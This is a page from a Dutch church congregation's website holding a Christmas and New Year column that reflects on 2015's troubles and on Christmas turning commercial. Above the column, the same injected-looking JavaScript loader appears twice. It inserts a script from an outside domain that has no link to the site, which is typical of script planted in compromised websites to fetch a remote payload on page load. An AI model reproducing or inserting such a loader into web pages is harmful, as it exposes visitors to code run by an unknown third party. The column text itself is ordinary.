;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inkopper ? - PKN Damwâld

Inkopper ?

Gepubliceerd op: vrijdag 30 september 2016

December, kerst, oud en nieuw, ze behoren bijna alweer tot het verleden. 2016 … we komen er aan ! En laten we wel zijn, 2015 was een bewogen jaar. Kijk maar naar het nieuws of lees de krant. Het lijkt of er nog nooit zoveel narigheid in de wereld is geweest. 2015 … het jaar van aanslagen, aardbevingen en overstromingen. 2015 … het jaar van Zwarte Piet, IS, alle aanslagen in Parijs, ‘vluchtelingen’, de toenemende vervolging van christenen wereldwijd en Volkswagen. En ehhh … even een vraagje …. somt u voor 2015 eens een paar positieve nieuwsfeiten op ?
Kerst, oud en nieuw. Het zijn dagen waarop we hopen de last van het dagelijkse leven even opzij te zetten. Voor menigeen dagen van bezinning en gezelligheid. Zoals het opzetten van een boom, de onvervalste kerstkraker ‘Last Christmas’, de zoveelste herhaling van ‘Home alone en de rituele familiebezoekjes. Elke jaargang worden er weer verliefde stelletjes bij ‘All You Need Is Love’ bij elkaar gebracht, worden er hartverwarmende acties op touw gezet om iets voor de medemens te betekenen en wordt er massaal ingeslagen om een heerlijk kerstdiner op tafel te zetten. Vrede, liefde, gezelligheid en lekker eten, dat is het geldende devies.
Deze koude en donkere wintermaanden zijn natuurlijk bij uitstek de ideale tijd om als familie en vrienden bij elkaar te zijn. Het duurt na de kerst dan ook niet lang of we mogen ons voorbereiden op de volgende feestdagen: oud en nieuw. Dagen met een altijd hectisch verloop. Er wordt vuurwerk verkocht en vooral afgestoken. Dan nadert oudejaarsnacht, het moment van de jaarwisseling. Onder het genot van een drankje, oliebollen en wat hapjes tellen we de laatste minuten af van het oudejaar, waarna de nieuwjaarsdag weer rust moet brengen. Iedereen luistert naar het nieuwjaarsconcert of valt in slaap bij het schansspringen. Maar vaak ook een dag waarop velen van ons, al dan niet in het geheim, een lijstje met goede voornemens maken.
In onze samenleving geven heel veel mensen steeds meer een hele andere betekenis aan Kerst en betekent een uitgesproken nieuwjaarswens vaak niet meer dan een vluchtige gedachte. Oud en nieuw zijn nog niet ‘omgeslagen’ of we vervallen met onze voornemens weer in oude gewoonten. Kerst vervlakt, vercommercialiseert en holt steeds meer uit tot een folkloristisch evenement met veel en lekker eten en drinken en vloeit meer en meer over in de schijnwereld van de kerstman en consorten.
Kerst, oud en nieuw zijn feestdagen die bol staan van rituelen en tradities. Gelukkig is het veel meer dan dat ! Als christenen vieren wij deze (kerst-)dagen de geboorte van Jezus Christus. Het feest van de komst van Jezus naar onze aarde. In Christus strekt God zijn hand naar ons uit en geeft ons een nieuwe, hoopvolle toekomst. Hét feest waar we op wachten en vol verlangen naar mogen uitzien: de terugkomst van Jezus op de aarde! Om in het verlengde van George Michael’s kersthit te blijven – en vergis je niet – : ‘CHRIST-M(-ay) A(-rrive) S (-oon) !
Het is mijn oprechte kerst- en nieuwjaarswens voor u en jou, dat Jezus Christus álles voor je mag (gaan) betekenen!

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns